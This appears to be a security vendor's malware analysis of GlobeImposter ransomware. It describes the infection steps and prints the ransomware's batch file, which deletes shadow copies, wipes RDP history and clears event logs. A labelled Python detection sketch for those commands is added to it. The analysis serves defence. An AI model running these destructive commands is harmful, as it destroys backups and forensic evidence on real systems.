GlobeImposter Ransomware renders system unbootable

November 10, 2017

The SonicWall Capture Labs Threat Research Team has come across ransomware that goes by the name GlobeImposter, also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and, as with all ransomware, encrypts the victim's files, making them unrecoverable without payment. Most ransomware has a built-in file extension filter that leaves executable files intact. This ransomware, however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%\{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encrypted files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to and received the following reply:

If %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the Trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

  @echo off
  vssadmin.exe Delete Shadows /All /Quiet
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
  cd %userprofile%\documents\
  attrib Default.rdp -s -h
  del Default.rdp
  for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
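Added example (not SonicWall's code): a Python sketch of detection logic for the three cleanup behaviours in the batch file above, run over process-creation records. The record layout, host names, PIDs and the two-behaviour threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# One rule per cleanup behaviour seen in the batch file above.
RULES = {
    "shadow_copy_delete": re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "rdp_history_wipe": re.compile(
        r"\breg(\.exe)?\s+delete\b.*terminal server client\\(default|servers)", re.I),
    "event_log_clear": re.compile(
        r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
}

# Constructed sample records: (host, parent_pid, command_line).
SAMPLE_EVENTS = [
    ("WS-01", 4120, "vssadmin.exe Delete Shadows /All /Quiet"),
    ("WS-01", 4120, r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f'),
    ("WS-01", 4120, 'wevtutil.exe cl "Security"'),
    ("SRV-02", 880, "vssadmin.exe list shadows"),   # benign inventory
    ("SRV-02", 880, "wevtutil.exe el"),             # enumerates logs only
    ("WS-03", 300, "wevtutil cl Application"),      # single behaviour
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def correlate(events, min_behaviours=2):
    """Group hits by (host, parent PID) and keep groups that show at
    least min_behaviours distinct cleanup behaviours."""
    seen = defaultdict(set)
    for host, ppid, cmd in events:
        seen[(host, ppid)].update(classify(cmd))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_behaviours}

if __name__ == "__main__":
    for (host, ppid), hits in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host} parent_pid={ppid}: {', '.join(hits)}")
```

Requiring two distinct behaviours from one parent process keeps a lone administrative log clear from alerting while still catching the batch file's sequence.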

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)